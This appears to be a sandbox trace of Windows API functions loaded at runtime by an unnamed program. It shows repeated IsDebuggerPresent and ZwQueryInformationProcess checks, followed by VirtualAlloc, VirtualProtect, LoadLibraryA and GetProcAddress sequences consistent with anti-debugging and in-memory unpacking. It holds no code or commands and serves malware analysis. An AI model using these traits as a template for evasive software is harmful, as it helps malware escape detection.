DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: GDI32.dll/GdiPrinterThunk
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
DynamicLoader: secur32.dll/InitSecurityInterfaceW
DynamicLoader: cryptsp.dll/SystemFunction035
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: unidrvui.dll/DrvResetConfigCache
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/StartDocDlgW
DynamicLoader: WINSPOOL.DRV/OpenPrinterW
DynamicLoader: WINSPOOL.DRV/ResetPrinterW
DynamicLoader: WINSPOOL.DRV/ClosePrinter
DynamicLoader: WINSPOOL.DRV/GetPrinterW
DynamicLoader: WINSPOOL.DRV/GetPrinterDriverW
DynamicLoader: WINSPOOL.DRV/EndDocPrinter
DynamicLoader: WINSPOOL.DRV/EndPagePrinter
DynamicLoader: WINSPOOL.DRV/ReadPrinter
DynamicLoader: WINSPOOL.DRV/StartDocPrinterW
DynamicLoader: WINSPOOL.DRV/StartPagePrinter
DynamicLoader: WINSPOOL.DRV/AbortPrinter
DynamicLoader: WINSPOOL.DRV/DocumentEvent
DynamicLoader: WINSPOOL.DRV/QuerySpoolMode
DynamicLoader: WINSPOOL.DRV/QueryRemoteFonts
DynamicLoader: WINSPOOL.DRV/SeekPrinter
DynamicLoader: WINSPOOL.DRV/QueryColorProfile
DynamicLoader: WINSPOOL.DRV/SplDriverUnloadComplete
DynamicLoader: WINSPOOL.DRV/DocumentPropertiesW
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/IsValidDevmodeW
DynamicLoader: WINSPOOL.DRV/GetSpoolFileHandle
DynamicLoader: WINSPOOL.DRV/CommitSpoolData
DynamicLoader: WINSPOOL.DRV/CloseSpoolFileHandle
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: mxdwdrv.dll/DrvEnableDriver
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: FontSub.dll/CreateFontPackage
DynamicLoader: unidrvui.dll/MxdcGetPDEVAdjustment
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: FontSub.dll/CreateFontPackage
DynamicLoader: unidrvui.dll/MxdcGetPDEVAdjustment
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: FontSub.dll/CreateFontPackage
DynamicLoader: unidrvui.dll/MxdcGetPDEVAdjustment
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: wbemcore.dll/Reinitialize
DynamicLoader: mmcss.dll/ServiceMain
DynamicLoader: mmcss.dll/SvchostPushServiceGlobals
DynamicLoader: pcwum.dll/PerfDeleteInstance
DynamicLoader: mmcss.dll/ServiceMain
DynamicLoader: pcwum.dll/PerfStopProvider
DynamicLoader: mmcss.dll/SvchostPushServiceGlobals
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/WmiCloseBlock
DynamicLoader: PROPSYS.dll/PropVariantToVariant
DynamicLoader: ole32.dll/CoDisconnectObject
DynamicLoader: wbemcore.dll/Shutdown
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/FreeConsole
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/lstrcmpA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/FreeConsole
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/lstrcmpA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: shell32.dll/
DynamicLoader: ADVAPI32.dll/OpenThreadToken
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: comctl32.dll/
DynamicLoader: propsys.dll/PSLookupPropertyHandlerCLSID
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: propsys.dll/PSCreatePropertyStoreFromObject
DynamicLoader: propsys.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: propsys.dll/PropVariantToStringAlloc
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: propsys.dll/PropVariantToBuffer
DynamicLoader: propsys.dll/PropVariantToUInt64
DynamicLoader: propsys.dll/PropVariantToBoolean
DynamicLoader: propsys.dll/InitPropVariantFromBuffer
DynamicLoader: ADVAPI32.dll/GetNamedSecurityInfoW
DynamicLoader: ADVAPI32.dll/TreeSetNamedSecurityInfoW
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: OLEAUT32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/FreeConsole
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/lstrcmpA
